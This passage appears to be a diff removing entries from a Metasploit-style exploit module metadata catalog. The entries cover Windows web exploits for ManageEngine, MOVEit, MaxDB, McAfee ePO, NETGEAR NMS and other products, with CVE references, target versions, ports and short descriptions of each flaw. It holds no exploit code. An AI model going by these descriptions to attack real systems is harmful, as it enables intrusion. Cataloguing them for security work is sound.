SYSTEM if\n started as a service.", - "references": [ - "CVE-2021-40539", - "URL-https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", - "URL-https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis", - "URL-https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", - "URL-https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py" - ], - "platform": "Java", - "arch": "java", - "rport": 8888, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Java Dropper" - ], - "mod_time": "2021-11-24 10:40:32 +0000", - "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2021_40539", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/manageengine_adselfservice_plus_cve_2022_28810": { - "name": "ManageEngine ADSelfService Plus Custom Script Execution", - "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-04-09", - "type": "exploit", - "author": [ - "Jake Baines", - "Hernan Diaz", - "Andrew Iwamaye", - "Dan Kelley" - ], - "description": "This module exploits the \"custom script\" feature of ADSelfService Plus. The\n feature was removed in build 6122 as part of the patch for CVE-2022-28810.\n For purposes of this module, a \"custom script\" is arbitrary operating system\n command execution.\n\n This module uses an attacker provided \"admin\" account to insert the malicious\n payload into the custom script fields. When a user resets their password or\n unlocks their account, the payload in the custom script will be executed.\n The payload will be executed as SYSTEM if ADSelfService Plus is installed as\n a service, which we believe is the normal operational behavior.\n\n This is a passive module because user interaction is required to trigger the\n payload. This module also does not automatically remove the malicious code from\n the remote target. Use the \"TARGET_RESET\" operation to remove the malicious\n custom script when you are done.\n\n ADSelfService Plus uses default credentials of \"admin\":\"admin\"", - "references": [ - "CVE-2022-28810", - "URL-https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html", - "URL-https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8888, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2022-04-20 15:22:07 +0000", - "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2022_28810", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_adshacluster_rce": { - "name": "ManageEngine Exchange Reporter Plus Unauthenticated RCE", - "fullname": "exploit/windows/http/manageengine_adshacluster_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-06-28", - "type": "exploit", - "author": [ - "Kacper Szurek " - ], - "description": "This module exploits a remote code execution vulnerability that\n exists in Exchange Reporter Plus <= 5310, caused by execution of\n bcp.exe file inside ADSHACluster servlet", - "references": [ - "URL-https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8181, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2022-10-07 01:59:52 +0000", - "path": "/modules/exploits/windows/http/manageengine_adshacluster_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adshacluster_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_appmanager_exec": { - "name": "ManageEngine Applications Manager Remote Code Execution", - "fullname": "exploit/windows/http/manageengine_appmanager_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-03-07", - "type": "exploit", - "author": [ - "Mehmet Ince " - ], - "description": "This module exploits command injection vulnerability in the ManageEngine Application Manager product.\n An unauthenticated user can execute a operating system command under the context of privileged user.\n\n Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials\n by accessing given system. This endpoint calls a several internal classes and then executes powershell script\n without validating user supplied parameter when the given system is OfficeSharePointServer.", - "references": [ - "CVE-2018-7890", - "BID-103358", - "URL-https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/", - "URL-https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/manageengine_appmanager_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_appmanager_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_apps_mngr": { - "name": "ManageEngine Applications Manager Authenticated Code Execution", - "fullname": "exploit/windows/http/manageengine_apps_mngr", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-04-08", - "type": "exploit", - "author": [ - "Jacob Giannantonio " - ], - "description": "This module logs into the Manage Engine Applications Manager to upload a\n payload to the file system and a batch script that executes the payload.", - "references": [ - "EDB-17152" - ], - "platform": "Windows", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2018-08-20 18:08:19 +0000", - "path": "/modules/exploits/windows/http/manageengine_apps_mngr.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_apps_mngr", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_connectionid_write": { - "name": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability", - "fullname": "exploit/windows/http/manageengine_connectionid_write", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-12-14", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n inject a null bye at the end of the value to create a malicious file with an arbitrary\n file type, and then place it under a directory that allows server-side scripts to run,\n which results in remote code execution under the context of SYSTEM.\n\n Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n but older ones run on port 8040. Also, using this exploit will leave debugging information\n produced by FileUploadServlet in file rdslog0.txt.\n\n This exploit was successfully tested on version 9, build 90109 and build 91084.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249", - "CVE-2015-8249" - ], - "platform": "Windows", - "arch": "", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "ManageEngine Desktop Central 9 on Windows" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_connectionid_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966": { - "name": "ManageEngine Endpoint Central Unauthenticated SAML RCE", - "fullname": "exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-01-10", - "type": "exploit", - "author": [ - "Khoa Dinh", - "horizon3ai", - "Christophe De La Fuente", - "h00die-gr3y " - ], - "description": "This exploits an unauthenticated remote code execution vulnerability\n that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10\n and below (CVE-2022-47966). Due to a dependency to an outdated library\n (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n code by providing a crafted `samlResponse` XML to the Endpoint Central\n SAML endpoint. Note that the target is only vulnerable if it is\n configured with SAML-based SSO , and the service should be active.", - "references": [ - "CVE-2022-47966", - "URL-https://blog.viettelcybersecurity.com/saml-show-stopper/", - "URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", - "URL-https://github.com/horizon3ai/CVE-2022-47966", - "URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis" - ], - "platform": "Java,Windows", - "arch": "", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Java (in-memory)", - "Windows EXE Dropper", - "Windows Command" - ], - "mod_time": "2024-06-14 12:05:12 +0000", - "path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_servicedesk_plus_cve_2021_44077": { - "name": "ManageEngine ServiceDesk Plus CVE-2021-44077", - "fullname": "exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-09-16", - "type": "exploit", - "author": [ - "wvu ", - "Y4er" - ], - "description": "This module exploits CVE-2021-44077, an unauthenticated remote code\n execution vulnerability in ManageEngine ServiceDesk Plus, to upload an\n EXE (msiexec.exe) and execute it as the SYSTEM account.\n\n Note that build 11305 is vulnerable to the authentication bypass but\n not the file upload. The module will check for an exploitable build.", - "references": [ - "CVE-2021-44077", - "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", - "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", - "URL-https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", - "URL-https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", - "URL-https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis", - "URL-https://xz.aliyun.com/t/10631" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Dropper" - ], - "mod_time": "2021-12-09 17:27:35 +0000", - "path": "/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_servicedesk_plus_cve_2021_44077", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/maxdb_webdbm_database": { - "name": "MaxDB WebDBM Database Parameter Overflow", - "fullname": "exploit/windows/http/maxdb_webdbm_database", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-08-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. By sending a specially-crafted HTTP request that contains\n an overly long database name. A remote attacker could overflow a buffer\n and execute arbitrary code on the system with privileges of the wahttp process.\n\n This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.", - "references": [ - "CVE-2006-4305", - "OSVDB-28300", - "BID-19660" - ], - "platform": "Windows", - "arch": "", - "rport": 9999, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MaxDB 7.6.00.16", - "MaxDB 7.6.00.27" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/maxdb_webdbm_database.rb", - "is_install_path": true, - "ref_name": "windows/http/maxdb_webdbm_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/maxdb_webdbm_get_overflow": { - "name": "MaxDB WebDBM GET Buffer Overflow", - "fullname": "exploit/windows/http/maxdb_webdbm_get_overflow", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-04-26", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. This service is included with many recent versions\n of the MaxDB and SAPDB products. This particular module is\n capable of exploiting Windows systems through the use of an\n SEH frame overwrite. The offset to the SEH frame may change\n depending on where MaxDB has been installed, this module\n assumes a web root path with the same length as:\n\n C:\\Program Files\\sdb\\programs\\web\\Documents", - "references": [ - "CVE-2005-0684", - "OSVDB-15816", - "URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities", - "BID-13368" - ], - "platform": "Windows", - "arch": "", - "rport": 9999, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "MaxDB 7.5.00.11 / 7.5.00.24", - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows 2003 English", - "Windows NT 4.0 SP4/SP5/SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/maxdb_webdbm_get_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/mcafee_epolicy_source": { - "name": "McAfee ePolicy Orchestrator / ProtectionPilot Overflow", - "fullname": "exploit/windows/http/mcafee_epolicy_source", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-17", - "type": "exploit", - "author": [ - "muts ", - "xbxice ", - "hdm ", - "aushack " - ], - "description": "This is an exploit for the McAfee HTTP Server (NAISERV.exe).\n McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n known to be vulnerable. By sending a large 'Source' header, the stack can\n be overwritten. This module is based on the exploit by xbxice and muts.\n Due to size constraints, this module uses the Egghunter technique.", - "references": [ - "CVE-2006-5156", - "OSVDB-29421", - "EDB-2467", - "BID-20288" - ], - "platform": "Windows", - "arch": "x86", - "rport": 81, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "ePo 2.5.1 (Service Pack 1)", - "ePo 3.5.0/ProtectionPilot 1.1.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/mcafee_epolicy_source.rb", - "is_install_path": true, - "ref_name": "windows/http/mcafee_epolicy_source", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/mdaemon_worldclient_form2raw": { - "name": "MDaemon WorldClient form2raw.cgi Stack Buffer Overflow", - "fullname": "exploit/windows/http/mdaemon_worldclient_form2raw", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-12-29", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n overflow occurs when an excessively long From field is specified.\n The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n continue to crash/execute the payload until the CGI output is manually deleted\n from the queue in C:\\MDaemon\\RawFiles\\*.raw.", - "references": [ - "CVE-2003-1200", - "OSVDB-3255", - "BID-9317" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal MDaemon.exe", - "Debugging test" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb", - "is_install_path": true, - "ref_name": "windows/http/mdaemon_worldclient_form2raw", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/minishare_get_overflow": { - "name": "Minishare 1.4.1 Buffer Overflow", - "fullname": "exploit/windows/http/minishare_get_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-07", - "type": "exploit", - "author": [ - "acaro " - ], - "description": "This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.", - "references": [ - "CVE-2004-2271", - "OSVDB-11530", - "BID-11620", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows 2000 SP0-SP3 English", - "Windows 2000 SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows 2003 SP0 English", - "Windows 2003 SP1 English", - "Windows 2003 SP2 English", - "Windows NT 4.0 SP6", - "Windows XP SP2 German", - "Windows XP SP2 Polish", - "Windows XP SP2 French", - "Windows XP SP3 French" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/minishare_get_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/minishare_get_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/miniweb_upload_wbem": { - "name": "MiniWeb (Build 300) Arbitrary File Upload", - "fullname": "exploit/windows/http/miniweb_upload_wbem", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-04-09", - "type": "exploit", - "author": [ - "AkaStep", - "bcoles " - ], - "description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n The software contains a file upload vulnerability that allows an\n unauthenticated remote attacker to write arbitrary files to the file system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", - "references": [ - "OSVDB-92198", - "OSVDB-92200", - "PACKETSTORM-121168" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "MiniWeb build 300 on Windows (Before Vista)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb", - "is_install_path": true, - "ref_name": "windows/http/miniweb_upload_wbem", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/moveit_cve_2023_34362": { - "name": "MOVEit SQL Injection vulnerability", - "fullname": "exploit/windows/http/moveit_cve_2023_34362", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-05-31", - "type": "exploit", - "author": [ - "sfewer-r7", - "rbowes-r7", - "bwatters-r7" - ], - "description": "This module exploits an SQL injection vulnerability in the MOVEit Transfer web application\n that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.\n Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an\n attacker can leverage an information leak be able to upload a .NET deserialization payload.", - "references": [ - "CVE-2023-34362", - "URL-https://github.com/sfewer-r7/CVE-2023-34362", - "URL-https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis", - "URL-https://www.wiz.io/blog/cve-2023-34362" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/moveit_cve_2023_34362.rb", - "is_install_path": true, - "ref_name": "windows/http/moveit_cve_2023_34362", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/navicopa_get_overflow": { - "name": "NaviCOPA 2.0.1 URL Handling Buffer Overflow", - "fullname": "exploit/windows/http/navicopa_get_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-09-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", - "references": [ - "CVE-2006-5112", - "OSVDB-29257", - "BID-20250" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "NaviCOPA 2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/navicopa_get_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/navicopa_get_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/netdecision_http_bof": { - "name": "NetDecision 4.5.1 HTTP Server Buffer Overflow", - "fullname": "exploit/windows/http/netdecision_http_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-24", - "type": "exploit", - "author": [ - "Prabhu S Angadi", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in NetDecision's HTTP service\n (located in C:\\Program Files\\NetDecision\\Bin\\HttpSvr.exe). By supplying a\n long string of data to the URL, an overflow may occur if the data gets handled\n by HTTP Server's active window. In other words, in order to gain remote code\n execution, the victim is probably looking at HttpSvr's window.", - "references": [ - "CVE-2012-1465", - "OSVDB-79651", - "URL-http://web.archive.org/web/20121024124508/http://secunia.com/advisories/48168/", - "URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "NetDecision 4.5.1 on XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/http/netdecision_http_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/netdecision_http_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/netgear_nms_rce": { - "name": "NETGEAR ProSafe Network Management System 300 Arbitrary File Upload", - "fullname": "exploit/windows/http/netgear_nms_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-02-04", - "type": "exploit", - "author": [ - "Ege BALCI ", - "Pedro Ribeiro " - ], - "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has multiple vulnerabilities that can allow an unauthenticated remote\n attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,\n SQL injection, arbitrary file upload, and privilege escalation across various versions.\n This module is able to spawn a meterpreter session by chaining together two specific\n vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.", - "references": [ - "ZDI-23-920", - "ZDI-23-918", - "CVE-2023-38096", - "CVE-2023-38098", - "CVE-2016-1525", - "US-CERT-VU-777024", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", - "URL-https://seclists.org/fulldisclosure/2016/Feb/30", - "URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "NETGEAR ProSafe Network Management System 300 / Windows" - ], - "mod_time": "2023-08-02 18:03:57 +0000", - "path": "/modules/exploits/windows/http/netgear_nms_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/netgear_nms_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/netmotion_mobility_mvcutil_deserialization": { - "name": "NetMotion Mobility Server MvcUtil Java Deserialization", - "fullname": "exploit/windows/http/netmotion_mobility_mvcutil_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-02-08", - "type": "exploit", - "author": [ - "mr_me", - "wvu " - ], - "description": "This module exploits an unauthenticated Java deserialization in the\n NetMotion Mobility server's MvcUtil.valueStringToObject() method, as\n invoked through the /mobility/Menu/isLoggedOn endpoint, to execute\n code as the SYSTEM account.\n\n Mobility server versions 11.x before 11.73 and 12.x before 12.02 are\n vulnerable. Tested against 12.01.09045 on Windows Server 2016.", - "references": [ - "CVE-2021-26914", - "URL-https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/", - "URL-https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020", - "URL-https://srcincite.io/advisories/src-2021-0007/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-07-08 21:26:35 +0000", - "path": "/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/netmotion_mobility_mvcutil_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/northstar_c2_xss_to_agent_rce": { - "name": "NorthStar C2 XSS to Agent RCE", - "fullname": "exploit/windows/http/northstar_c2_xss_to_agent_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-03-12", - "type": "exploit", - "author": [ - "h00die", - "chebuya" - ], - "description": "NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is\n vulnerable to a stored xss.\n An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.\n With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts\n (agents), and kill the original agent.\n\n Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on\n Ubuntu 22.04. The agent was running on Windows 10 19045.", - "references": [ - "URL-https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/", - "URL-https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc", - "URL-https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c", - "CVE-2024-28741" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2024-04-24 16:54:58 +0000", - "path": "/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb", - "is_install_path": 